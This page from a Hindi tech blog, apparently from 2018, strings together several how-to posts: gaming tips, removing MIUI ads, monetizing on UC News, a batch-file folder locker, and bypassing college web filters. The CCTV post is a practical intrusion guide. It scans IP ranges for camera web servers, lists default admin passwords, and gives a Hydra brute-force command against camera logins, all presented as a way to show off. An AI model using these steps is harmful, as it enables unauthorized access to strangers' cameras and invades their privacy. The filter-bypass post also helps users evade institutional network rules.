3.DirectX का लेटेस्ट वर्जन install करके रखें यह बहुत ही जरूरी है Windows में गेमिंग करने के लिए क्योंकि काफी तरह के tools  प्रोवाइड करता है graphics हमेशा खुद इंस्टॉल करने की जरूरत नहीं पड़ती होगी जब हम गेम स्टार्ट करते हैं तब कहीं गेम्स के अंदर यह पहले से ही होता है जिससे वह साथ में ही गेम के इंस्टॉल हो जाता है.                                                                                                                                          अगर आप चेक करना चाहते हैं कि आपके हमेशा नहीं कौन सा version है Direct X तो search bar मैं dxdiag लिखे और enter दबाएं. थोड़ी देर में आपको सारी इंफॉर्मेशन दी जाएगी जिसमें लिखा होगा कि आपके DirectX का version क्या है और इसके अलावा भी बहुत कुछ मिल जाएगा. 


4.GPU को overclock करना beginners के लिए काफी risky और चुनौतीपूर्ण हो सकता है. इस फीचर से आपके लैपटॉप को force किया जाता है कि वह अपनी परफॉर्मेंस बढ़ाएं यह ऑप्शन AMD और NVIDIA GPU दोनों मे है. इसमें मैं मुश्किल की बात यह है कि यह काफी गर्म हो जाता है और power भी काफी खाता है पेशेंट को निकालने के लिए जो लैपटॉप का फैन हो तो अपनी पूरी कोशिश करता है पर अगर उसने थोड़ी मिट्टी वगैरह होगी तो वह अपना काम अच्छे से नहीं कर पाता इसलिए स्टेप 1 को ध्यान में रखते हुए हमेशा अपने लैपटॉप को साफ रखना चाहिए इस समय जो सबसे बेहतरीन overclocking tool है वह है MSI AFTERBURNER जो दोनों AMD और NVIDIA के लिए बेहतरीन है. 

5. अपने लैपटॉप में पावर सेटिंग्स को ठीक करके रखें windows हमें काफी अच्छी पावर मैनेजमेंट की ऑप्शन देता है लैपटॉप के मामलों में इन को नजरअंदाज कर दिया जाता है ताकि उसकी बैटरी ठीक रहें और लंबी चले.  अच्छी GAMING एक्सपीरियंस के लिए  आपको LAPTOP किसी पावर OUTLET के साथ कनेक्ट करके रखना पड़ेगा एक बार ऐसा करने के बाद आप सेटिंग में जाएं सिस्टम पर क्लिक करें कृपया इस लिंक पर क्लिक करें एडिशनल पावर सेटिंग पर क्लिक करके हाई परफोर्मेंस पर क्लिक करें. 

6. बैकग्राउंड एप्स को बंद करें. आजकल हर किसी के पास WINDOW 10 है,WINDOW 10 मैं एक खास फीचर है जिसका नाम के मॉडल विंडो टेन के अलावा किसी और WINDOWS में यह ऑप्शन नहीं है पर वह उसको मैंने बोल कर सकते हैं इससे पहले कि आप STEAM मैं PLAY पर क्लिक करें या फिर कोई और गेम चलाएं तो पहले ही देख लीजिए कि बैकग्राउंड में कोई एप्स चल ना रही हो 

ऐसा करने के लिए आप टास्क मैनेजर खोल सकते हैं TASK BAR TRAY पर राइट क्लिक करके फिर TASK MANAGER टास्क मैनेजर SELECT करें. 

7. TEXTURE और SHADE SETTING को ADJUST करें. यह बहुत जरूरी है कि आपGRAPHIC CARD की सेटिंग को देखें यहां पर आपको बहुत ज्यादा मास्टर कंट्रोल मिल सकते हैं जिससे आपकी GAMING EXPERIENCE पर काफी पर पड़ेगा यहां पर आपको TEXTURE और SHADE ऑप्शन दिखाइए जो बताएगी आपकी GAME कैसी दिखेगी आपके GPU के हिसाब से यह सेटिंग सिलेक्ट की जा सकती है. आप अपनी जरूरत के हिसाब से ऐसा क्यों सेटिंग्स के साथ छेड़छाड़ कर सकते हैं अगर अच्छा गGAME EXPERIENCE चाहिए तो इन सेटिंग्स को हमेशा LOW मैं रखें.


Tags:- how to,perfomance,increase,hindi mein,india,oll portal,windows,game,latest,2018,new,pc,laptop.
How to stop ads in miui ||Hindi mein||

Monday, 19 February 2018

How to stop ads in miui ||Hindi mein||

- No comments

Mi phones mein ads kaise bnd krein

Hello Oll portal ke pathko,
          आज मैं फिर से आपके लिए एक और नई अच्छी पोस्ट लेकर आया हूं जो आपके लिए काफी ज्यादा फायदेमंद होंगे खासतौर पर उन लोगों के लिए जो अभी MI का फोन भी उस इस्तेमाल कर रहे हैं. Mi जो कि एक बहुत ही बड़ी कंपनी है और काफी बजट में अपने मोबाइल से निकाल रही है उन्होंने अभी हाल ही में एक नई update निकाली थी जिसमें काफी फीचर्स ऐसे थे जो लोगों को बहुत पसंद है उन्होंने उन features को बहुत पसंद किया पर अब हर चीज परफेक्ट तो होती नहीं इसलिए उसमें भी कुछ एक दो खामियां थी पर फिर भी यह अपडेट काफी बढ़िया थी 

              इस अपडेट के आने के बाद मोबाइल में काफी सारी चीजे बदल गई मोबाइल मेंsplit scrren ऑप्शन आ गया जिससे कि आप एक ही समय पर दो एप्लीकेशंस चला सकते हैं और उन दोनों एप्लीकेशंस की screen आप को एक साथ show होगी. पर हाल ही में एक लेटेस्ट अपडेट आया है MIUI MUSIC APPLICATION का इस अपडेट मे MUSIC APPLICATION मैं ADS दिखने लगी और और भी कुछ ऐसी एप्लीकेशन जो एड्स दिखाती है 
                             आज मैं आपको यही बताऊंगा कि आप कैसे इन एप्लीकेशंस में से एड्स ADS को हटाए. इन ADS को हटाने के लिए नीचेS लिखे गए STEPS को करो. 


MI MUSIC एप्लीकेशन के लिए:- 

  1. पहले MI MUSIC एप्लीकेशन खोलें. 
  2. अब बाए (LEFT) से(TO) दाए (RIGHT) को स्वाइप करें. 
  3. अब सेटिंग्स(SETTINGS) पर क्लिक करें 
  4. अब ADVANCED SETTINGS पर क्लिक करें 
  5. रिकमेंडेशन(RECOMMENDATION) को डिसेबल(TURN OFF OR DISABLE) करें 


MIUI से ADS हटाने के लिए :- 

  1. सबसे पहले सेटिंग(SETTINGS) पर क्लिक करें 
  2. अब अबाउट(ABOUT) पर क्लिक करें 
  3. MIUI VERSION पर तब तक क्लिक करें जब तक आपका डेवलपर ऑप्शन आ ना जाए. 
  4. ADDITIONAL SETTINGS पर क्लिक करें. 
  5. DEVELOPER OPTION पर क्लिक करें 
  6. और MIUI OPTIMIZATION को OFF कर दे.  

College mein restricted websites ko kaise access krein

Sunday, 18 February 2018

College mein restricted websites ko kaise access krein

- No comments

College mein restricted websites ko kaise access krein

Hello Oll Portal ke pathko
         muje pura yakeen hai ki aaj ki ye post aap sbko bhut psnd aayegi,Yeh post khas tor par un readers ke liye hai jo abhi colleges aur schools mein hai. abhi kuch dino pehele jab mein college gya toh maine dekha ki kafi sites aisi hai jo hum access nhi kar patey kyonki college ne apney internet par kuch restriction lga rkhi hoti hai.
                          aaj mein aapko un restrictions ko bypass krke unauthorized sites ko access krna seekhaunga.yeh bhut he aasan hai. bas neeche likhe hue instruction ko follow kro. Iskey do treekay hai aur dono treeke neeche likhe hue hai,

Pehla treeka:-

  1. whatismyipaddress  ko google search bar par type kro aur apna ip address dhoondo.
  2. Ab browser mein google translate khole.
  3. Ab detect language kis jgah english laguage ya aur koi apni psnd ki language choose krein.
  4. Ab likhne wali jgah par http://whatismyipaddress.com/  type krein aur Translate par click krein.
  5. Ab dekhe ki aapki ip address change hua ya nhi. Agr nhi toh doosra method try kro aur dekho ki wo work krta hai ya nhi.

Doosra treeka:-

  1. Yeh link open krein apney browser mein http://www.google.com/translate?langpair=es|en&u=www.ollportal.blogspot.com
  2. www.ollportal.blogspot.com ki jgah apni uss website ka naam likhe jisey aap access krna chahtey hai.

Teesra treeka:-

Agr ye dono treeke bhi kaam na krein toh aakhri treeka yhi hai ki aap koi VPN install krein aur mn chahi site access krein.

Kisi aur ke CCTV camera ki footage kaise dekhe

Kisi aur ke CCTV camera ki footage kaise dekhe

- 15 comments

Kisi aur ke CCTV camera ki footage kaise dekhe 

Hello Oll Portal ke pathko
          आज मैं आप सबको एक ऐसी चेक करके दिखाऊंगा जिससे आप लोगों के सामने शो ऑफ कर सकेंगे हम सब कभी न कभी कुछ अलग करना चाहते हैं दूसरों से जिसके लिए मैं आज यह पोस्ट लिख रहा हूं. इस पोस्ट में आपको बताऊंगा कि आप कैसे किसी भी सीसीटीवी कैमरे की फुटेज अपने लैपटॉप पर आराम से देख सकते हैं या फिर Android में देख सकते हैं. इसके बारे में जितने भी steps है वह नीचे लिखे हैं:- 

चीजों की आवश्यकता यह करने के लिए:- 

  1. सॉफ्टवेयर(software) ANGRY IP SCANNER 
  2. वर्किंग इंटरनेट कनेक्शन 
  3. ऑपरेटिंग सिस्टम: LINUX, WINDOWS 


जरूरी स्टेप्स पब्लिक/ प्राइवेट CCTV कैमरा को एक्सेस करने के लिए:- 

  • Angry ip scanner को डाउनलोड करें. 
  • IP एड्रेस चेंज यूज़ करें यह बहुत जरूरी है कि आप एक ठीक आई पी एड्रेस ट्रांसलेट करें सीसीटीवी कैमरा के लिए cCTV कैमरा उसको ब्रॉडबैंड इंटरनेट कनेक्शन के साथ कनेक्ट किया जाता है अगर आप पब्लिक इंटरनेट कनेक्शन चला रहे हैं तो आप अपनी पब्लिक IP एड्रेस सर्च करें यह सर्च करने के लिए आप Google पर MY IP लिखें. वह आपको आपके IP एड्रेस दिखा देगा. EXAMPLE अगर मेरा IP एड्रेस 77.123.46.5 है तो मैं IP RANGE रेंज 77.123.46 से 77.123.47.5 रखूंगा. 
  • ANGRY IP SCANNER को खोलो और TOOL टूल्स पर क्लिक करें फिर फ्PREFRENCES पर क्लिक करें. 
  • फिर PORT पर क्लिक करें. फिर ADD PORT करें 80,8080,23  इस तरह यह 80,8080 और 23 को PORT SCAN करेगा. 
  • हमें एक और चीज ऐड करने की जरूरत पड़ेगीWE किसका नाम है WEB DETECT यह हमें iP की डिटेल शो करेगा जैसे कि cCTV CCTV camera model name​. CCTV camera name​. Router name or router model name​. WEB DETECT को ऐड करने के लिए TOOLS पर क्लिक करें फिर FETCHERS पर क्लिक करें फिर ADD WEB DETECT करें 
  • फिर OK क्लिक करें 
  • अब शुरुआत की और आखिरी IP ADDRESS एड्रेस भरकर स्कैनिंग शुरू करे 
  • अब स्टार्ट पर क्लिक करें 

स्कैनिंग के खत्म होने के बाद WEB DETECT कुछ खास ढूंढे मजेदार ढूंढे जैसे कि 

  1. RomPager/4.07 UPnP/1.0 ----- router​
  2. uc-httpd 1.0.0 ----- CCTV camera​
  3. DVRDVS-Webs ----- CCTV camera​
  4. microhttpd ----- router​
  5. Webs ----- CCTV camera​
  6. Hikvision-Webs ----- CCTV camera​
  7. iBall-Baton ----- CCTV camera​ 

अब सीसीटीवी कैमरे का IP एड्रेस कॉपी करें और उसे ब्राउज़र के सर्च बार में पेस्ट कर दें 

कुछ USERNAME और PASSWORD CCTV कैमरा के लॉगइन पेज के:- 

  1. Username : admin | password : admin
  2. Username : admin | password : (blank password)
  3. Username : admin | password : 9999
  4. Username : admin | password : 12345 

सीसीटीवी कैमरा के पासवर्ड निकालने के लिए आपको नीचे लिखी हुई चीजें करनी पड़ेगी:- 

सबसे सबसे पहले तो LINUX INSTALL करें या फिर हाइड्रा(HYDRA) 

अब FIRE UP करें KALI को root@DeepHack:~# hydra -s 80 -l admin -P /root/Desktop/wl/cctvpass.txt -e ns -t 16 targetIP http*Hydra syntax 

-s 80 -- define port number
-l admin -- default login name admin
-P /root/desktop/worldlist.txt -- choose your word list for brute force
-e --- empty password
ns --- try login as passwordand try empty password
http --- port name for attack 

इस  आर्टिकल को मैंने सिर्फ पढ़ाई के तौर पर लिखा है बाकी लोग कुछ नया सीख पाएंगे जान सके और उनका इंटरेस्ट टेक्नोलॉजी के साथ बना रहे 

इसके अलावा आप Google पर जाकर यह भी ले सकते हैं UNSECURED CCTV CAMERAS इससे आपको सीसीटीवी कैमरा के फोटोस देख पाएंगे जो पब्लिकली अवेलेबल है और यह कहीं के भी हो सकते हैं इंडिया के बाहर के भी और इंडिया के अंदर के भी.

 TAGS:- How to,live,latest,tips,educarion,windows,android,linux,fub,not,boring,tags,2018,cctv,education,see,angry,ip,scanner,hindi,movie,oll portal,original,google,yahoo,search

Apney blog ka traffic kaise increase(bdhaye) krein

Saturday, 17 February 2018

Apney blog ka traffic kaise increase(bdhaye) krein

- No comments

Apney blog ka traffic kaise increase(bdhaye) krein

Hello Oll Portal ke pathko
                                 आज मैं आपको एक बहुत ही बेहतरीन तरीके बताऊंगा जिससे कि आपके ब्लॉक का ट्रैफिक काफी ज्यादा बढ़ जाएगा. और यह तरीका एकदम सुरक्षित है इससे आपके एडसेंस के बंद हो जाने का कोई खतरा नहीं तो आइए इसके बारे में नीचे पढ़े. 
                   अधिकतर हम सब लोग मोबाइल चला ही रहे हैं वह भी Android और काफी लोग UC browser इस्तेमाल कर रहे हैं. हम सब ने काफी समय से एक चीज जरूर देखी होगी कि उसके homepage पर हमें काफी सारी advertisement दिखाई देती है जिस में अधिकतर न्यूज़ होती है टेक्नोलॉजी से संबंधित स्वास्थ्य से संबंधित और इधर उधर की बातें. आपके दिमाग में भी कभी यह बात आई होगी कि काश आप अपना ब्लॉग या फिर अपनी कोई न्यूज़ इस पर शेयर कर सकते हैं. तो आज मैं आपको पोस्ट में ही सिखाऊंगा कि आप कैसे अपने लिखे हुए आर्टिकल्स को uC के होम पेज पर दिखाएं. UC news application राइटर और ब्लॉगर को मौका देती है कि वह अपने आर्टिकल को UC न्यूज़ एप्लीकेशन पर डालकर उसे monitize करें और पैसे कमाएं इससे आपको दोहरी कमाई हो सकती है uC न्यूज़ एप्लीकेशन और एडसेंस(adsense) से इस पोस्ट इस पोस्ट के आखिर में आपको कुछ ऐसे तरीके में बताऊंगा जिससे आप बहुत ज्यादा पैसे कमा सकेंगे. 

UC न्यूज़ एप्लीकेशन पर Publish कैसे करें:- 

  1. UC न्यूज़ एप्लीकेशन खोलें या फिर यहां क्लिक करें 
  2. अकाउंट के लिए साइन अप (sign up)करें 
  3. अकाउंट के अप्रूवल(approval) में  ज्यादा से ज्यादा 48 घंटे लगते हैं 
  4. अकाउंट कैसे सेक्स पूरा शुरू होने के बाद डैशबोर्ड पर लॉगिन करें 
  5. पोस्टर पर क्लिक करें 
  6. नई पोस्ट select करें 
  7. अब अपना आर्टिकल लिखें और उस पर एक अच्छी सी image लगाएं 
  8. publish पर क्लिक करें 
  9. अब बस आपको खुश देखने इंतजार करना होगा जब तक कि आपकी पोस्ट पब्लिश के लिए approved नहीं हो जाती. 

UC न्यूज़ एप्लीकेशन से पैसे कैसे कमाएं:- 


UC न्यूज़ एप्लीकेशन पर आर्टिकल डालने के बाद युवाओं को सबसे पहले वह काम है अपने आर्टिकल को monitize  करने का. पर monetizing का प्रोसेस बताने से पहले मैं आपको कुछ एक दो बातें और बता देना चाहता हूं जिनसे आप कुछ अधिक पैसे कमा पाएंगे. 
   इसमें सबसे पहले बात ही आती है कि कंटेंट जितना अच्छा होगा आपकी पोस्ट उतनी ही जल्दी अप्रूव होगी और उतनी ही जल्दी लोगों तक पहुंचेगी और वह इस आर्टिकल को पढ़ पाएंगे. अगर आप चाहते हैं कि user आप की ही पोस्ट को पढ़ें तो आपको clickbait देनी होगी. इसका सीधा सा मतलब है कि आपका आर्टिकल लिखने और पढ़ने मैं होगा उतनी ही जल्दी शुरू होगा और लोगों तक पहुंचाएं जिससे कि लोग जल्दी से पढ़ पाएंगे 

Monetize  कैसे करें:- 

  •  रिपोर्टिंग (reporting) टैब पर क्लिक करें 
  • income data सेलेक्ट करे. 
  • ad monetization पर क्लिक करें. 

बस आपको यही सब करना monetization के लिए पर कुछ बातों का खास ध्यान रखें जो निम्नलिखित है:- 

आपका रिवेन्यू तभी काउंट होगा जब आप ad monetization( मोनेटाइजेशन )के लिए successfully अप्लाई कर लोगे। 
आखिरी हफ्ते की सारी कमाई बुधवार को अपडेट होगी। 
Balance बताता है कि कि आप कितने पैसे निकलवा सकते हैं उस समय। 
आप हमेशा कम से कम 50 USD डॉलर  26 से लेकर 28 तारीख तक निकलवा सकते हैं हर महीने। 
हमेशा पैसे निकलवाने के बाद आपको एक मैसेज आएगा और एक मेल आएगी। 
वह इस समय सिर्फ USD करेंसी देता है पर आप अपनी लोकल करेंसी भी निकलवा सकते है। 

TAGS:- HOW TO,ANDROID,NEWS,BLOGGING,WINDOWS,INTERNET,EARNING,TIPS,LATEST,NEW,ADSENSE,MONEY,EASY,TUTORIAL,HINDI,OLL PORTAL

kisi folder par password kasie lgaye ||windows||

Thursday, 15 February 2018

kisi folder par password kasie lgaye ||windows||

- No comments

Folder पर password कैसे लगाए 

Hello oll Portal ke pathko,
                       आज आपके लिए हो नीचे लेकर आया हूं मैं जिस में आपको बहुत ही ज्यादा मज़ा आएगा क्योंकि यह अधिकतर लोगों के लिए बहुत जरूरी है जैसे हम सबको पता है कि आजकल कंप्यूटर और लैपटॉप बहुत ही आम हो चुका है हम सबकी जिंदगी में और हम सब के कंप्यूटर चैप्टर में कुछ ऐसी चीजें होती हैं हम किसी को नहीं दिखाना चाहते इसके लिए हमें उसे hide करके रखते हैं पर कभी-कभी हम उसे और सुरक्षित करने के लिए कुछ और अलग चीजें करना चाहते हैं जैसे कि जैसे ही उस पर password लगाना चाहते हैं मुझे एक 2 मेल्स (mails) आई थी जिनमें लोगों ने कहा था कि हमें कोई ऐसा तरीका बताएं जिससे कि हम अपने फोल्डर को पासवर्ड प्रोटेक्टेड रख सकते हैं इसीलिए मैं आज आपके लिए यह पोस्ट डाल रहा हूं जिसमें मैं आपको बताऊंगा कि आप कैसे कैसे फोल्डर को पासवर्ड को टाइट रख सकते हैं ताकि कोई भी आपके इलावा से नहीं खुलता है इस तरह को मैंने खुद चेक किया है कि यह काम करता है कि नहीं और मैंने पाया कि यह बहुत ही फायदेमंद होगा पर जो इंसान एक tech savy है जो बहुत ही ज्यादा टेक्नोलॉजी के बारे में जानता है 
तो वह इस चीज को बड़े आराम से रिवर्स इंजीनियरिंग करके पासवर्ड हासिल कर सकेगा पर हमारा मेन मोटिव है अपने फोल्डर को हाईड करना और पासवर्ड प्रोटेक्ट(password protect) करना इसके लिए मैं आपको यह प्रोसेस(process) बताने जा रहा हूं . safety के लिए इसे पहले किसी ऐसी फाइल (file) के साथ यूज़ (use) करके देखें जिसकी आपको आवश्यकता नहीं है . 

फोल्डर (folder) को पासवर्ड (password) प्रोटेक्टेड(protected) कैसे बनाएं:- 

1.सबसे पहले तो आप उस फोल्डर को खोलें जिस फोल्डर में आप की वह वाली files है जिनको आप पासवर्ड प्रोटेक्ट (password protect) करना चाहते हैं . फिर उस फोल्डर में खाली जगह पर राइट क्लिक (right click) करें. 

2.अब contextual menu (मेन्यू) में न्यू सिलेक्ट(new select) करें. 


3.अब अब टेक्स्ट डॉक्यूमेंट (text document) पर क्लिक (click) करें. 


4.अब keyboard पर enter बटन दबाएं. इस से कोई मतलब नहीं पड़ता कि आप  इस फाइल को क्या नाम देंगे क्योंकि पूरा प्रोसेस के बाद आपने उस फाइल को डिलीट करना है. 

5.अब और टेक्स्ट डॉक्यूमेंट(text document) को खोलें. और नीचे लिखा हुआ कोड (code) उसमें पेस्ट (paste) करें
cls
@ECHO OFF
title Folder Locker
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Are you sure u want to Lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock folder
set/p "pass=>"
if NOT %pass%==Your-Password-Here goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End
:End
6.अब उस डॉक्यूमेंट (document) में"your-password-here" ढूंढे 


7.और"YOUR-PASSWORD-HERE" की जगह अपना पासवर्ड (password) लिखें जिसे आप फोल्डर को खोल सके. 

8.अब फाइल(file) पर क्लिक करें. फिर "save as" पर क्लिक करें. 

9.अब टेक्स्ट डॉक्यूमेंट (text document menu bar) पर क्लिक करें जो "save as type" के साथ है. 

10.और सेलेक्ट करें (select "ALL FILES") 


11.और फाइल नेम चेंज करके"FOLDERLOCKER.BAT" रखें. 


12.अब SAVE पर क्लिक(CLICK) करें. 

13.अब डबल क्लिक (DOUBLE CLICK) करें उस FOLDERLOCKER पर . जिसे "LOCKER" फोल्डर बन जाएगा
 

14.अब आप अपने उस फोल्डर में वह चीजें डाल सकता है जो आप लोगों से छुपाना चाहते हैं. 


15.अब "FOLDERLOCKER" पर क्लिक करें. और स्क्रीन पर "Y" टाइप करें और "ENTER" दबाएं 


16.अब अगर आप अपने उस फोल्डर को अनलॉक (unlock) करना चाहते हैं तो आप वह पासवर्ड एंटर करें जो आपने"YOUR-PASSWORD-HERE" की जगह लिखा था. 

17.फोल्डर को फिर से लॉक करने के लिए आप"FOLDERLOCKER" पर क्लिक करें और स्क्रीन पर "Y" लिख कर "ENTER" बटन दबाएं.

TAGS:- how to,lock,unlock,hide,unhide,windows,windows 10,windows 7,window 11,latest.notepad,india,usa,google,oll portal,fun,android,text,tips,news,latest
Instagram new feature solution ||screenshot||

About | Sitemap | Privacy Policy | Contact |